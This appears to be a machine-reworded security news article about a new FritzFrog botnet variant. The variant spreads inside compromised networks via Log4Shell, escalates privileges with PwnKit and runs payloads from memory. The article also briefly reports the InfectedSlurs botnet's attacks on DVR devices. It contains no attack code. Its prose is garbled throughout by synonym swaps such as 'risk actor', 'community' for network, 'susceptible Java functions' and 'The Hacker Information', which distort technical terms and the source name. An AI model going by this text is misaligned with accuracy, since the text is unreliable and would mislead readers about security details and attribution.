The risk actor behind a peer-to-peer (P2P) botnet often called FritzFrog has made a return with a brand new variant that leverages the Log4Shell vulnerability to propagate internally inside an already compromised community.
“The vulnerability is exploited in a brute-force method that makes an attempt to focus on as many susceptible Java functions as attainable,” net infrastructure and safety firm Akamai mentioned in a report shared with The Hacker Information.
FritzFrog, first documented by Guardicore (now a part of Akamai) in August 2020, is a Golang-based malware that primarily targets internet-facing servers with weak SSH credentials. It is identified to be lively since January 2020.
It has since advanced to strike healthcare, training, and authorities sectors in addition to improved its capabilities to finally deploy cryptocurrency miners on contaminated hosts.
What’s novel in regards to the newest model is using the Log4Shell vulnerability as a secondary an infection vector to particularly single out inner hosts reasonably than concentrating on susceptible publicly-accessible property.
“When the vulnerability was first found, internet-facing functions had been prioritized for patching due to their vital danger of compromise,” safety researcher Ori David mentioned.
“Contrastly, inner machines, which had been much less more likely to be exploited, had been usually uncared for and remained unpatched — a circumstance that FritzFrog takes benefit of.”
Which means even when the internet-facing functions have been patched, a breach of another endpoint can expose unpatched inner techniques to exploitation and propagate the malware.
The SSH brute-force part of FritzFrog has additionally obtained a facelift of its personal to determine particular SSH targets by enumerating a number of system logs on every of its victims.
One other notable change within the malware is use of the PwnKit flaw tracked as CVE-2021-4034 to attain native privilege escalation.
“FritzFrog continues to make use of ways to stay hidden and keep away from detection,” David mentioned. “Particularly, it takes particular care to keep away from dropping information to disk when attainable.”
That is completed by the use of the shared reminiscence location /dev/shm, which has additionally been put to make use of by different Linux-based malware akin to BPFDoor and Commando Cat, and memfd_create to execute memory-resident payloads.
The disclosure comes as Akamai revealed that the InfectedSlurs botnet is actively exploiting now-patched safety flaws (from CVE-2024-22768 by means of CVE-2024-22772, and CVE-2024-23842) impacting a number of DVR machine fashions from Hitron Programs to launch distributed denial-of-service (DDoS) assaults.
